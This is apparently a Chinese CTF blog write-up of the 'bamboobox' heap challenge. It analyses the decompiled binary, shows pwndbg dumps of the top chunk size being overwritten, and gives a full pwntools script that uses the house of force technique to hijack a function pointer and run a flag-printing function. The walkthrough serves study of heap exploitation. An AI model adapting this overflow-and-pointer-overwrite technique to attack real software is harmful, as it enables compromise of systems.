堆利用-house_of_force-bamboobox题详解

最新推荐文章于 2023-03-22 17:22:32 发布
最新推荐文章于 2023-03-22 17:22:32 发布
阅读量433 收藏 1
点赞数
分类专栏: Pwn 文章标签: 堆利用 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43390703/article/details/121323806
版权

bamboobox

基本情况分析

查看基本保护

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY   Fortified       Fortifiable     FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   89) Symbols

运行查看一些基本逻辑,又是一个菜单类的题,应该就是堆的题。

There is a box with magic
what do you want to do in the box
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:

程序分析

main

可以看到很特别的在选择5,退出之前会执行一次v4[1](),正常来讲这个是goodbye_message函数的执行。

int __cdecl main(int argc, const char **argv, const char **envp)
{
****
  v4 = (void (**)(void))malloc(0x10uLL);
  *v4 = (void (*)(void))hello_message;
  v4[1] = (void (*)(void))goodbye_message;
  (*v4)();
  while ( 1 )
  {
    menu();
    read(0, buf, 8uLL);
    switch ( atoi(buf) )
    {
      case 1:
        show_item();
        break;
      case 2:
        add_item();
        break;
      case 3:
        change_item();
        break;
      case 4:
        remove_item();
        break;
      case 5:
        v4[1]();
        exit(0);
      default:
        puts("invaild choice!!!");
        break;
    }
  }
}

show_item

int show_item()
{
  int i; // [rsp+Ch] [rbp-4h]

  if ( !num )
    return puts("No item in the box");
  for ( i = 0; i <= 99; ++i )
  {
    if ( *((_QWORD *)&unk_6020C8 + 2 * i) )
      printf("%d : %s", (unsigned int)i, *((const char **)&unk_6020C8 + 2 * i));
  }
  return puts(byte_401089);
}

add_item

__int64 add_item()
{
***
  if ( num > 99 )
  {
    puts("the box is full");
  }
  else
  {
    printf("Please enter the length of item name:");
    read(0, buf, 8uLL);
    v2 = atoi(buf);
    if ( !v2 )
    {
      puts("invaild length");
      return 0LL;
    }
    for ( i = 0; i <= 99; ++i )
    {
      if ( !*((_QWORD *)&unk_6020C8 + 2 * i) )
      {
        *((_DWORD *)&itemlist + 4 * i) = v2;              ## 存储chunk大小
        *((_QWORD *)&unk_6020C8 + 2 * i) = malloc(v2);    ## 存储chunk的地址
        printf("Please enter the name of item:");
        *(_BYTE *)(*((_QWORD *)&unk_6020C8 + 2 * i) + (int)read(0, *((void **)&unk_6020C8 + 2 * i), v2)) = 0;                                       ## 读入数据
        ++num;
        return 0LL;
      }
    }
  }
  return 0LL;
}

change_item

unsigned __int64 change_item()
{
***
  if ( num )
  {
    printf("Please enter the index of item:");
    read(0, buf, 8uLL);
    v1 = atoi(buf);
    if ( *((_QWORD *)&unk_6020C8 + 2 * v1) )  #该索引存在chunk存储的地址(存在)
    {
      printf("Please enter the length of item name:");  #可以执行控制读入的长度,存在可以溢出改写的漏洞
      read(0, nptr, 8uLL);
      v2 = atoi(nptr);
      printf("Please enter the new name of the item:");
      *(_BYTE *)(*((_QWORD *)&unk_6020C8 + 2 * v1) + (int)read(0, *((void **)&unk_6020C8 + 2 * v1), v2)) = 0;
    }
    else
    {
      puts("invaild index");
    }
  }
  else
  {
    puts("No item in the box");
  }
  return __readfsqword(0x28u) ^ v5;
}

remove_item

unsigned __int64 remove_item()
{
***
  if ( num )
  {
    printf("Please enter the index of item:");
    read(0, buf, 8uLL);
    v1 = atoi(buf);
    if ( *((_QWORD *)&unk_6020C8 + 2 * v1) )
    {
      free(*((void **)&unk_6020C8 + 2 * v1));
      *((_QWORD *)&unk_6020C8 + 2 * v1) = 0LL;
      *((_DWORD *)&itemlist + 4 * v1) = 0;
      puts("remove successful!!");
      --num;
    }
    else
    {
      puts("invaild index");
    }
  }
  else
  {
    puts("No item in the box");
  }
  return __readfsqword(0x28u) ^ v3;
}

关键点

存在一个读入大小可控的点,可以实现house of force或者unlink。

存在一个magic函数,可以直接读取flag。

调试分析

断点信息
b *0x00000000004009B4
b *0x0000000000400B21
b *0x0000000000400C4B
b *0x0000000000400D47

初始节点

Your choice:2
Please enter the length of item name:16
Please enter the name of item:aaaaaaaa

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0x603020
Size: 0x21

Top chunk | PREV_INUSE
Addr: 0x603040
Size: 0x20fc1


pwndbg> x/30gx 0x603000
0x603000:       0x0000000000000000      0x0000000000000021
0x603010:       0x0000000000400896      0x00000000004008b1 #两个messege函数的地址
0x603020:       0x0000000000000000      0x0000000000000021
0x603030:       0x6161616161616161      0x000000000000000a
0x603040:       0x0000000000000000      0x0000000000020fc1
0x603050:       0x0000000000000000      0x0000000000000000

修改topchunk的size

Your choice:3
Please enter the index of item:0
Please enter the length of item name:32
Please enter the new name of the item:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

pwndbg> x/40gx 0x603000
0x603000:       0x0000000000000000      0x0000000000000021
0x603010:       0x0000000000400896      0x00000000004008b1
0x603020:       0x0000000000000000      0x0000000000000021
0x603030:       0x6161616161616161      0x6161616161616161
0x603040:       0x6161616161616161      0x6161616161616161
0x603050:       0x0000000000000000      0x0000000000000000

我们可以看到topchunk的size确实可以被修改,那么这题可以用HOF进行攻击。

脚本调试

初始堆块

进行第一个堆块申请,为后续调用溢出,修改topchunk的size作准备。

    additem(0x70,'aaaaaaaa')

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x1896000
Size: 0x21

Top chunk | PREV_INUSE
Addr: 0x1896020
Size: 0x20fe1

pwndbg> x/20gx 0x1896000
0x1896000:      0x0000000000000000      0x0000000000000021
0x1896010:      0x0000000000400896      0x00000000004008b1
0x1896020:      0x0000000000000000      0x0000000000020fe1
0x1896030:      0x0000000000000000      0x0000000000000000

溢出修改size

    modify(0,0x80,payload1)

pwndbg> x/30gx 0x1896000
0x1896000:      0x0000000000000000      0x0000000000000021
0x1896010:      0x0000000000400896      0x00000000004008b1
0x1896020:      0x0000000000000000      0x0000000000000081
0x1896030:      0x6161616161616161      0x6161616161616161
0x1896040:      0x6161616161616161      0x6161616161616161
0x1896050:      0x6161616161616161      0x6161616161616161
0x1896060:      0x6161616161616161      0x6161616161616161
0x1896070:      0x6161616161616161      0x6161616161616161
0x1896080:      0x6161616161616161      0x6161616161616161
0x1896090:      0x6161616161616161      0x6161616161616161
0x18960a0:      0x0000000000000000      0xffffffffffffffff
0x18960b0:      0x0000000000000000      0x0000000000000000

TOPchunk机制

通过这一句调整topchunk下一步分配内容所在位置,实现任意写。第二句进行调用内存分配,让新建立堆块分布在指定位置,实现对目标位置的改写。

    additem(size, 'dddd')
    additem(0x10,payload2)

pwndbg> x/30gx 0x1896000
0x1896000:      0x0000000000000000      0x0000000000000099
0x1896010:      0x0000000000400896      0x00000000004008b1
0x1896020:      0x0000000000000000      0x0000000000000081
0x1896030:      0x6161616161616161      0x6161616161616161
0x1896040:      0x6161616161616161      0x6161616161616161
0x1896050:      0x6161616161616161      0x6161616161616161
0x1896060:      0x6161616161616161      0x6161616161616161
0x1896070:      0x6161616161616161      0x6161616161616161
0x1896080:      0x6161616161616161      0x6161616161616161
0x1896090:      0x6161616161616161      0x6161616161616161
0x18960a0:      0x0000000000000000      0x00ffffffffffff61
0x18960b0:      0x0000000000000000      0x0000000000000000

成功测试

输入5,返回调用我们修改的内存地址。(原来会执行goodbye函数,但是现在存储该函数的位置被我们修改成了magic)

注意点

1.申请的堆块大小不要太小。一开始我申请的是0x10,但是一直无法成功,将其改大为0x70即可成功

2.需要修改top chunk产生多大的偏移和我们申请的堆块大小有一定的关系(本题有,但是具体情况需要具体分析,只需要多调试关注堆块结构即可)

EXP

#!/usr/bin/env python


from pwn import *


r = process('./bamboobox')

def additem(length,name):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(length))
    r.recvuntil(":")
    r.sendline(name)

def modify(idx,length,name):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))
    r.recvuntil(":")
    r.sendline(str(length))
    r.recvuntil(":")
    r.sendline(name)

def remove(idx):
    r.recvuntil(":")
    r.sendline("4")
    r.recvuntil(":")
    r.sendline(str(idx))

def show():
    r.recvuntil(":")
    r.sendline("1")
if __name__ == '__main__':
    magic_add=0x000000000400D49
    payload1='a'*0x70+p64(0)+p64(0xffffffffffffffff)
    size = -0xa0-0x10
    payload2='a'*8+p64(magic_add)
    input()
    additem(0x70,'aaaaaaaa')
    modify(0,0x80,payload1)
    additem(size, 'dddd')
    additem(0x10,payload2)
    r.interactive()
Fasthand_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习入门
Peanuts
02-22 838
借助hitcon training的目对三种利用方法进行了一个系统的学习,刚入坑的小白们可以一起学习一下。目链接:https://github.com/scwuaptx/HITCON-Training Use after free 记录一波建立文件过程 mkdir + name touch + name echo 'context' &gt; n...
Tree-House_Unit8
03-04
Tree-House_Unit8
henrik-ibsen_a-dolls-house_r-farquharson-sharp
03-15
henrik-ibsen_a-dolls-house_r-farquharson-sharp
Linux下溢出利用3-bamboobox思路之unlink
haibiandaxia的博客
09-08 620
#coding=utf8 from pwn import * context.log_level = 'debug' context(arch='amd64', os='linux') local = 1 elf = ELF('./bamboobox') if local: p = process('./bamboobox') libc = elf.libc else: p = remote('116.85.48.105',5005) libc = ELF('./libc.
大学英语综合教程四 Unit 1至Unit 8 课文内容英译中 中英翻译
热门推荐
亓官劼的博客
05-01 5万+
大学英语综合教程四 Unit 1至Unit 8课文内容英译中 中英翻译   大家好,我叫亓官劼(qí guān jié ),在CSDN中记录学习的点滴历程,时光荏苒,未来可期,加油~博客地址为:亓官劼的博客 本文原创为亓官劼,请大家支持原创,部分平台一直在盗取博主的文章!!! 博主目前仅在CSDN中写博客,唯一博客更新的地址为:亓官劼的博客 文本为博主整理翻译所得,送给有...
bamboobox和unlink
m0_62326489的博客
07-14 145
hhh
Linux下溢出利用4-bamboobox思路之house of force
haibiandaxia的博客
10-10 309
Linux下溢出利用4-bamboobox思路之house of force1 前言2 程序和调试环境准备2.1 实验环境2.2 实验目标3 反编译程序3.1 检查安全机制3.2 main函数 1 前言 因这段时间在忙护网,再加上对块进行负方向移动不理解,导致更新迟了一些,后来经过反复调试,查看状态,才慢慢理解,详细内容见正文吧。 2 程序和调试环境准备 2.1 实验环境 Linux ubuntu 16.04.1 gdb 7.11.1 bamboobox(目标程序) Python 2.7.12
HITCON training lab 11——bamboobox
04-23 547
64位程序  #House Of Force 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 _QWORD *v3; // [rsp+8h] [rbp-18h] 4 char buf; // [rsp+10h] [rbp-10h] 5 ...
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 694
hitcontraining_bamboobox这道有两种解方式: house of force 参考:house of force unlink house of force详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 目流程 程序一开始申请0x10的块,存放hello_message和.
溢出——unlink漏洞攻击(bamboobox
fzucaicai的博客
03-22 744
当要free掉某个块时,如果其低地址的chunk是空闲的,那么这里的P就是被释放掉的块的地址减去自己的pre_size里的数值,这样就可以指向低地址的chunk的chunk头了,通过溢出修改掉被释放的chunk的pre_size和size,就可以达到释放该chunk时,unlink调用的P是是指向假chunk的chunk头。1.首先检查被合并的chunk的大小是否正确,程序会先检查被合并的chunk的size是否与其物理相连的下一个chunk的presize是否相符。
house-master_house_
10-01
房屋出租jsp完整代码带sql 谢谢支持
colouredglaze-fashion-house-master_java_
10-02
OFD Reader&Writer 提供OFD的生成、解析、签章、转换。依照《GB/T 33190-2016 电子文件存储与交换格式版式文档》实现的OFD版式文档,读写库
cd.zip_CD_data_Ian Cumming_matlab Frank-Read_radarsat-1_syntheti
09-14
Artech House, 2005. On this web site, programs are provided in MATLAB to read the data and parameters from the CD. The structure of the programs is outlined in Figure 1. There are two main programs ...
CET-6 Word’s defination from Oxford dictionary 大学英语六级词汇剑桥英文释义
03-01 1212
abandon - əˈbændən = to leave somebody, especially somebody you are responsible for, with no intention of returning. abnormal - æbˈnɔːrml = different from what is usual or expected, especially i...
暑假集训——Hitcon_Trainning——lab11_bamboobox——unlink
qq_41667316的博客
07-15 414
UNLINK 思路 其实是艰辛的心路历程 这道是昨天晚上这个时间就想到的思路 [虽然是道基础但是是难得的一道没看别人exp就想到怎么写的,当时觉得自己已经登顶了(bushi] 毕竟是一道套路的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,溢出。的几个漏洞里面,溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
[BUUCTF]PWN——hitcontraining_bambooboxHouse of force+unlink)
mcmuyanga的博客
03-02 1230
hitcontraining_bamboobox 附件 步骤 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的执行情况,经典的的菜单,并且根据第一行的提示,估计存在后门 64位ida载入,猜测有后门,检索字符串果真发现了后门,不过根据buu的习性,一般flag在根目录下,这个后门应该用不大上,先记一下magic_addr=0x400d49 main()函数,发现输入5的时候会去执行v4[1],v4[1]里面是goodbye_message的地址,如果后门的
Linux系统和程序中的DEP和ASLR保护机制
简单IoT
10-07 3251
你好
从wiki 重新打基础之 House Of Force
qq_41071646的博客
08-05 396
这次的暑假集训 感觉学到的东西还是比较可以的, 然后 大概是 16号左右是集训结束 本来的想法呢 是 看看mips 的 东西 但是发现 其实 那里的东西大部分还是栈溢出 然后感觉还是要老老实实的打基础 看看什么时候 (大概是 集训结束 ) 在看看那些东西 现在 先把基础打好,, 这个 House Of Force 刷CTF的时候遇到的 还真的不多 好像基本都没有怎么遇到过这类目 这个...
union.buffers <- gUnaryUnion(house_buffers)
最新发布
06-06
首先,house_buffers是一个包含多个缓冲区对象的列表或集合。gUnaryUnion()函数将这些缓冲区对象进行合并,生成一个表示合并后缓冲区的对象。 最终,将生成的合并后缓冲区对象赋值给union.buffers变量,以便后续...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值